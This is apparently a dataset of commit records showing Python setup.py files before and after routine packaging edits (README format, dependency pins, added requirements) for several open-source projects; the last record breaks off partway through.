version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.md').read(),
install_requires=[
"certifi",
],
)
| Use md instead of rst | Use md instead of rst
| Python | mit | logentries/le_python,jcftang/le_python,drgarcia1986/le_python | from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.rst').read(),
install_requires=[
"certifi",
],
)
Use md instead of rst | from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.md').read(),
install_requires=[
"certifi",
],
)
| <commit_before>from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.rst').read(),
install_requires=[
"certifi",
],
)
<commit_msg>Use md instead of rst<commit_after> | from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.md').read(),
install_requires=[
"certifi",
],
)
| from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.rst').read(),
install_requires=[
"certifi",
],
)
Use md instead of rstfrom distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.md').read(),
install_requires=[
"certifi",
],
)
| <commit_before>from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.rst').read(),
install_requires=[
"certifi",
],
)
<commit_msg>Use md instead of rst<commit_after>from distutils.core import setup
setup(
name='Logentries',
version='0.7',
author='Mark Lacomber',
author_email='marklacomber@gmail.com',
packages=['logentries'],
scripts=[],
url='http://pypi.python.org/pypi/Logentries/',
license='LICENSE.txt',
description='Python Logger plugin to send logs to Logentries',
long_description=open('README.md').read(),
install_requires=[
"certifi",
],
)
|
8682d4fe70571e6ad06357cd7d1f30559ed177ce | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter==3.1', 'click==6.6', 'click-default-group==1.2'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter', 'click-default-group', 'click'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
| Remove 3rd package required version | Remove 3rd package required version
| Python | mit | ptpt/ptwit | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter==3.1', 'click==6.6', 'click-default-group==1.2'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
Remove 3rd package required version | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter', 'click-default-group', 'click'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
| <commit_before>#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter==3.1', 'click==6.6', 'click-default-group==1.2'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
<commit_msg>Remove 3rd package required version<commit_after> | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter', 'click-default-group', 'click'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter==3.1', 'click==6.6', 'click-default-group==1.2'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
Remove 3rd package required version#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter', 'click-default-group', 'click'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
| <commit_before>#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter==3.1', 'click==6.6', 'click-default-group==1.2'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
<commit_msg>Remove 3rd package required version<commit_after>#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
def readme():
with open('README.rst') as f:
return f.read()
setup(name='ptwit',
version='0.0.9',
description='A simple twitter command line client',
long_description=readme(),
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Utilities'],
url='https://github.com/ptpt/ptwit',
author='Tao Peng',
author_email='ptpttt+ptwit@gmail.com',
keywords='twitter, command-line, client',
license='MIT',
py_modules=['ptwit'],
install_requires=['python-twitter', 'click-default-group', 'click'],
entry_points='''
[console_scripts]
ptwit=ptwit:main
''',
zip_safe=False)
|
e093b77da3f914d15ace4d916cbe0ae9543c1327 | setup.py | setup.py | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"django-mssql >= 1.5",
"pywin32 >= 219",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) | Add mssql to staging branch | Add mssql to staging branch
| Python | mit | fraunhoferfokus/mobile-city-memory,jessepeng/coburg-city-memory,fraunhoferfokus/mobile-city-memory,jessepeng/coburg-city-memory | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
)Add mssql to staging branch | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"django-mssql >= 1.5",
"pywin32 >= 219",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) | <commit_before>import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
)<commit_msg>Add mssql to staging branch<commit_after> | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"django-mssql >= 1.5",
"pywin32 >= 219",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) | import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
)Add mssql to staging branchimport ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"django-mssql >= 1.5",
"pywin32 >= 219",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) | <commit_before>import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
)<commit_msg>Add mssql to staging branch<commit_after>import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "mobile-city-history",
version = 0.1,
author = "Jan-Christopher Pien",
author_email = "jan_christopher.pien@fokus.fraunhofer.de",
url = "http://www.foo.bar",
license = "MIT",
description = "A mobile city history to enable citizens to explore the history of their surroundings.",
packages = find_packages(),
zip_safe = False,
include_package_data = True,
install_requires = [
"sparqlwrapper",
"django >= 1.6",
"jsonpickle >= 0.7.0",
"django-apptemplates",
"django-mssql >= 1.5",
"pywin32 >= 219",
"djangorestframework",
"schedule",
],
classifiers = [
"Programming Language :: Python",
"Development Status :: 2 - Pre-Alpha",
"Environment :: Web Environment",
"Intended Audience :: Other Audience",
"Framework :: Django",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: News/Diary",
],
) |
5b7b410d49f82d90b5846edaa523cd8b0a703b07 | setup.py | setup.py | # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7']
else:
requirements = ['click >= 6.7']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
| # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7',
'jinja2 >= 2.9.6']
else:
requirements = ['click >= 6.7', 'jinja2 >= 2.9.6']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
| Add jinja2 as install requirement | Add jinja2 as install requirement
| Python | bsd-3-clause | mandeep/conda-verify | # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7']
else:
requirements = ['click >= 6.7']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
Add jinja2 as install requirement | # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7',
'jinja2 >= 2.9.6']
else:
requirements = ['click >= 6.7', 'jinja2 >= 2.9.6']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
| <commit_before># (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7']
else:
requirements = ['click >= 6.7']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
<commit_msg>Add jinja2 as install requirement<commit_after> | # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7',
'jinja2 >= 2.9.6']
else:
requirements = ['click >= 6.7', 'jinja2 >= 2.9.6']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
| # (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7']
else:
requirements = ['click >= 6.7']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
Add jinja2 as install requirement# (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7',
'jinja2 >= 2.9.6']
else:
requirements = ['click >= 6.7', 'jinja2 >= 2.9.6']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
| <commit_before># (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7']
else:
requirements = ['click >= 6.7']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
<commit_msg>Add jinja2 as install requirement<commit_after># (c) 2017 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
from setuptools import setup
import sys
from conda_verify import __version__
if sys.version_info.major == 2:
requirements = ['backports.functools_lru_cache >= 1.4', 'click >= 6.7',
'jinja2 >= 2.9.6']
else:
requirements = ['click >= 6.7', 'jinja2 >= 2.9.6']
setup(
name="conda-verify",
version=__version__,
author="Continuum Analytics, Inc.",
author_email="conda@continuum.io",
url="https://github.com/conda/conda-verify",
license="BSD",
description="A tool for validating conda recipes and conda packages",
long_description=open('README.md').read(),
packages=['conda_verify'],
install_requires=requirements,
entry_points='''
[console_scripts]
conda-verify=conda_verify.cli:cli
''',
)
|
7143e2706dbf78a064b49369a4b17636ef0bf6dd | setup.py | setup.py | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'dingo==0.1.0-pre+git.477bf495',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup},
dependency_links=['https://github.com/openego/dingo/archive/'\
'477bf49534f93aca90ba3c5231fe726972343939.zip'\
'#egg=dingo-0.1.0-pre+git.477bf495']
) | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
'ding0==0.1.2',
'networkx >=1.11',
'shapely >= 1.5.12, <= 1.5.12',
'pandas >=0.19.2, <=0.20.1'
],
cmdclass={
'install': InstallSetup}
) | Install with dingo version 0.1.2 | Install with dingo version 0.1.2
| Python | agpl-3.0 | openego/eDisGo,openego/eDisGo | from setuptools import find_packages, setup
from setuptools.command.install import install
import os
BASEPATH='.eDisGo'
class InstallSetup(install):
def run(self):
self.create_edisgo_path()
install.run(self)
@staticmethod
def create_edisgo_path():
edisgo_path = os.path.join(os.path.expanduser('~'), BASEPATH)
data_path = os.path.join(edisgo_path, 'data')
if not os.path.isdir(edisgo_path):
os.mkdir(edisgo_path)
if not os.path.isdir(data_path):
os.mkdir(data_path)
setup(
name='eDisGo',
version='0.0.1',
packages=find_packages(),
url='https://github.com/openego/eDisGo',
license='GNU Affero General Public License v3.0',
author='gplssm, nesnoj',
author_email='',
description='A python package for distribution grid analysis and optimization',
install_requires = [
